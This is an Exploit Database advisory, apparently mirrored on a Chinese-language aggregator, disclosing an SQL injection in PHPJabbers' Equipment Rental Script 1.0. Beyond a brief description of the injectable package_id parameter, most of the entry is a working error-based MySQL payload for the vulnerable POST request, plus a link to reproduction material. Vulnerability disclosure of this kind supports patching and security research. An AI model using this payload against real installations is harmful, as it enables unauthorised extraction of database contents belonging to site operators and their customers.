Equipment Rental Script-1.0 – SQLi

• Exploit Database
• 16 阅读

• 作者： nu11secur1ty
  日期： 2024-01-29
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51749/

• ## Title: Equipment Rental Script-1.0 - SQLi
  ## Author: nu11secur1ty
  ## Date: 09/12/2023
  ## Vendor: https://www.phpjabbers.com/
  ## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
  ## Reference: https://portswigger.net/web-security/sql-injection
  
  ## Description:
  The package_id parameter appears to be vulnerable to SQL injection
  attacks. The payload ' was submitted in the package_id parameter, and
  a database error message was returned. You should review the contents
  of the error message, and the application's handling of other input,
  to confirm whether a vulnerability is present. The attacker can steal
  all information from the database!
  
  [+]Payload:
  mysql
  
  Parameter: #1* ((custom) POST)
  Type: error-based
  Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
  Payload: package_id=(-4488))) OR 1 GROUP BY
  CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
  END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
  MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
  
  ## Reproduce:
  https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
  
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  home page: https://www.nu11secur1ty.com/